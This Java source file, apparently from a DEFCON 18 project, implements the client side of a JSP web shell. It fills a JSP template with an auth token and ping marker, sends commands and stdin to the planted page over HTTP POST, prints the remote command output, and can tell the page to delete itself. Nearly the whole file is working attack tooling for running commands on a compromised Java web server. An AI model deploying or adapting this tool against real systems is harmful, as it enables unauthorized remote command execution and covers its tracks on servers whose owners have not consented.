package net.darkmist.defcon18;

import java.io.BufferedInputStream;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.net.ProtocolException;
import java.rmi.RemoteException;
import java.util.Arrays;
import java.util.concurrent.ArrayBlockingQueue;
import java.util.regex.Pattern;

import org.apache.commons.codec.binary.Base64;
import org.apache.commons.codec.binary.Base64InputStream;
import org.apache.commons.httpclient.DefaultHttpMethodRetryHandler;
import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.methods.GetMethod;
import org.apache.commons.httpclient.methods.PostMethod;
import org.apache.commons.httpclient.params.HttpMethodParams;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class JSPClient implements Runnable
{
	private static final Class<JSPClient> CLASS = JSPClient.class;
	private static final Logger logger = LoggerFactory.getLogger(CLASS);
	private static final String JSP_RESOURCE = "jsp";
	private static CharSequence JSP_BASE = Util.getResourceStringRef(CLASS, JSP_RESOURCE);
	public static final String AUTH_KEY_TAG	= "AUTH_KEY_VALUE";
	public static final String  PING_TAG = "PING_VALUE";
	public static final Pattern AUTH_KEY_PAT = Pattern.compile("@@AUTH_KEY_VALUE@@");
	public static final boolean DEBUG_JSP = logger.isDebugEnabled();
	public static final Pattern DEBUG_PAT = Pattern.compile("@@DEBUG@@");
	public static final String DEBUG_VALUE = DEBUG_JSP ? "" : "//";
	public static final Pattern DEBUG_JSP_START_PAT = Pattern.compile("@@DEBUG_JSP_START@@");
	public static final String DEBUG_JSP_START_VALUE = DEBUG_JSP ? "" : "<%--";
	public static final Pattern DEBUG_JSP_END_PAT = Pattern.compile("@@DEBUG_JSP_END@@");
	public static final String DEBUG_JSP_END_VALUE = DEBUG_JSP ? "" : "--%>";
	public static final Pattern PING_PAT = Pattern.compile("@@PING_VALUE@@");
        protected static final String PARAM_AUTH = "auth";
        protected static final String PARAM_RM = "rm";
        protected static final String PARAM_RM_VALUE = "true";
	protected static final String PARAM_DATA = "data";

	protected HttpClient client;
	protected String url;
	protected ArrayBlockingQueue<byte[]> stdinQueue = new ArrayBlockingQueue<byte[]>(1);
	protected MinBlockingInputStream in = new MinBlockingInputStream(System.in);
	protected Thread stdinThread;
	protected String auth = AUTH_KEY_TAG;
	protected String ping = PING_TAG;

	private JSPClient()
	{
		client = new HttpClient();
		client.getParams().setParameter(HttpMethodParams.RETRY_HANDLER, new DefaultHttpMethodRetryHandler(0, false));
	}

	public String generate()
	{
		String content;

		content = AUTH_KEY_PAT.matcher(JSP_BASE).replaceAll(auth);
		content = PING_PAT.matcher(content).replaceAll(ping);
		content = DEBUG_PAT.matcher(content).replaceAll(DEBUG_VALUE);
		content = DEBUG_JSP_START_PAT.matcher(content).replaceAll(DEBUG_JSP_START_VALUE);
		content = DEBUG_JSP_END_PAT.matcher(content).replaceAll(DEBUG_JSP_END_VALUE);
		return content;
	}

	public JSPClient(HttpClient client_arg, String authParm, String pingParm)
	{
		client = client_arg;
		setAuth(authParm);
		setPing(pingParm);
	}

	public JSPClient(HttpClient client_arg)
	{
		client = client_arg;
	}

	public synchronized String getAuth()
	{
		if(auth == null)
			auth = Util.randToken();
		return auth;
	}

	public synchronized void setAuth(String auth_)
	{
		auth = auth_;
	}

	public synchronized String getPing()
	{
		if(ping == null)
			ping = Util.randToken();
		return ping;
	}

	public synchronized void setPing(String ping_)
	{
		ping = ping_;
	}

	public String getURL()
	{
		return url;
	}

	public void setURL(String url_n)
	{
		url = url_n;
	}

	protected void usage()
	{
		System.err.println("usage: " + this.getClass().getName() + " url cmd [args]");
		System.exit(-1);
	}

	protected void putStdin(byte[] bytes)
	{
		while(true)
		{
			try
			{
				stdinQueue.put(bytes);	// blocking
				return;
			}
			catch(InterruptedException e)
			{
				logger.debug("InterruptedException while enqueuing stdin...ignored", e);
			}
		}
	}

	public void run()
	{
		byte[] bytes;

		do
		{
			bytes = null;
			try
			{
				bytes = in.readBlockAvailable();
			}
			catch(IOException e)
			{
				logger.error("IOException received reading stdin", e);
			}
			if(bytes==null)
				putStdin(Util.EMPTY_BYTE_ARRAY);
			else
				putStdin(bytes);
				
		}while(bytes!=null);
		try
		{
			in.close();
		}
		catch(IOException e)
		{
			logger.error("IOException closing stdin", e);
		}
		in = null;
	}

	protected void joinStdin()
	{
		if(stdinThread == null)
			return;
		while(true)
		{
			try
			{
				stdinThread.join();
				stdinThread = null;
				return;
			}
			catch(InterruptedException e)
			{
				logger.warn("InterruptedException joining stdin thread...ignoring..",e);
			}
		}
	}

	protected void startStdin()
	{
		stdinThread = new Thread(this);
		stdinThread.setDaemon(true);
		stdinThread.start();
	}

	protected byte[] getInputBytes()
	{
		byte[] bytes;

		if(stdinThread == null)
		{
			//logger.debug("stdinThread==null");
			return null;
		}
		if((bytes = stdinQueue.poll())==null)
			return Util.EMPTY_BYTE_ARRAY;
		else if(bytes.length == 0)
		{	// EOF
			joinStdin();
			return null;
		}
		else
			return bytes;
	}

	protected String encodeObject(Object o)
	{
		try
		{
			ByteArrayOutputStream baos = new ByteArrayOutputStream();
			ObjectOutputStream oos = new ObjectOutputStream(baos);

			oos.writeObject(o);
			oos.close();
			return Util.toUTF8String(Base64.encodeBase64(baos.toByteArray()));
		}
		catch(IOException e)
		{
			throw new IllegalStateException("IOException when writing to a ByteArrayOutputStream?", e);
		}
	}

	protected Integer doRequest(Object o) throws Throwable
	{
		ObjectInputStream stream;
		InputStream resultStream;
		PostMethod post;
		int code;

		//logger.debug("creating post method, url=" + url);
		/*
		if(logger.isDebugEnabled())
		{
			if(o==null)
				logger.debug("o=null=");
			else if(!(o.getClass().isArray()))
				logger.debug("o="+o.toString() + '=');
			else if(o.getClass().getComponentType().equals(String.class))
				logger.debug("o="+Arrays.toString((String[])o) + '=');
			else
				logger.debug("o="+Arrays.toString((byte[])o) + '=');
		}
		*/
		post = new PostMethod(getURL());
		post.addParameter(PARAM_AUTH, getAuth());
		post.addParameter(PARAM_DATA, encodeObject(o));
		client.executeMethod(post);

		code = post.getStatusCode();
		if(400<=code&&code<=599)
			throw new RemoteException("Calling JSP returned HTTP Status: " + post.getStatusLine());
		if(logger.isDebugEnabled())
		{
			byte[] bytes = post.getResponseBody();
			resultStream = new ByteArrayInputStream(bytes);
			logger.debug("input={}", new String(bytes, post.getResponseCharSet()));
		}
		else
			resultStream = post.getResponseBodyAsStream();
		stream = new ObjectInputStream(new Base64InputStream(resultStream));

		try
		{
			o = stream.readObject();
			logger.debug("o={}", o);
		}
		catch(ClassNotFoundException e)
		{
			ProtocolException pe = new ProtocolException("Server sent unknown class!");
			pe.initCause(e);
			throw pe;
		}
		if(o instanceof Throwable)
			throw (Throwable)o;
		if(o instanceof Integer)
			return (Integer)o;
		System.out.write((byte[])o);
		System.out.flush();
		try
		{
			o = stream.readObject();
			logger.debug("o={}", o);
		}
		catch(ClassNotFoundException e)
		{
			ProtocolException pe = new ProtocolException("Server sent unknown class!");
			pe.initCause(e);
			throw pe;
		}
		System.err.write((byte[])o);
		System.err.flush();
		post.releaseConnection();
		return null;
	}

	protected static String[] clipArgs(String[] args)
	{
		String[] ret = new String[args.length-1];
		System.arraycopy(args,1,ret,0,args.length-1);
		return ret;
	}

	public void doRm() throws IOException
	{
		BufferedInputStream stream;
		PostMethod post;

		logger.debug("doing rm...");
		post = new PostMethod(getURL());
		post.addParameter(PARAM_AUTH, getAuth());
		post.addParameter(PARAM_RM, PARAM_RM_VALUE);
		logger.debug("executing rm...");
		client.executeMethod(post);

		logger.debug("reading result...");
		stream = new BufferedInputStream
			(post.getResponseBodyAsStream());
		while(stream.read()>=0);
		post.releaseConnection();
	}

	public boolean doPing() throws IOException
	{
		GetMethod get;
		String result;
		boolean success;

		logger.debug("doing ping...");
		get = new GetMethod(getURL());

		try
		{
			logger.debug("executing ping...");
			client.executeMethod(get);
			logger.debug("reading result...");
			if((result = get.getResponseBodyAsString())==null)
			{
				logger.info("null ping result?");
				return false;
			}
		}
		finally
		{
			get.releaseConnection();
		}
		success = result.contains(getPing());
		if(logger.isDebugEnabled())
		{
			logger.debug("result={}", result.trim());
			logger.debug("ping={}", getPing());
			logger.debug("success={}", success);
		}
		return result.contains(getPing());
	}

	public int instanceMain(String args[]) throws Throwable
	{
		Integer result;

		if(args.length < 2)
			usage();
		setURL(args[0]);
		args = clipArgs(args);

		if(logger.isDebugEnabled())
			logger.debug("doing initial request: args={}", Arrays.toString(args));
		doRequest(args);
		args = null;

		logger.debug("starting stdin thread");
		startStdin();
		logger.debug("starting io loop...");
		while((result=doRequest(getInputBytes()))==null);
		return result.intValue();
	}

	public static void main(String args[]) throws Throwable
	{
		System.exit(new JSPClient().instanceMain(args));
	}
}
